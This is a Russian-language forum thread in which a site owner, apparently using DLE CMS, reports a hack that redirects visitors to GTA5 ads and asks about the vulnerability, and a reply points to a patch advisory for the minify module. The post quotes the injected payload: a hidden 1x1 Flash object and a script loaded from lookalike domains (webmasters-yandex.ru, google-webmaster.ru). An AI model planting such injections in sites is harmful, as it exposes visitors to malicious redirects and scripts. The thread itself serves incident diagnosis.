вопрос
Доброго времени суток.
Сегодня обнаружил что сайт мой ломанули.
Подгружался скрипт в полной новости. Когда производиться клик, сразу происходит редирект на сайт с рекламой ГТА5.
Бегло просмотрел код и ничего серьёзного не нашёл. Папку engine восстановил из бэкапа.
Потом заметил что база выросла в 2 раза. В поле shortstory и fullstore добавился скрипт:
Буду рад если меня кто то ткнёт носом на уязвимость.
Сегодня обнаружил что сайт мой ломанули.
Подгружался скрипт в полной новости. Когда производиться клик, сразу происходит редирект на сайт с рекламой ГТА5.
Бегло просмотрел код и ничего серьёзного не нашёл. Папку engine восстановил из бэкапа.
Потом заметил что база выросла в 2 раза. В поле shortstory и fullstore добавился скрипт:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?697725096"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?76846966" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ru/0663a4ddceacb40b095eda264a85f15c.js"></script>
Буду рад если меня кто то ткнёт носом на уязвимость.
А все последние заплатки стоят? Если нет то возможно вот это:
http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html
http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html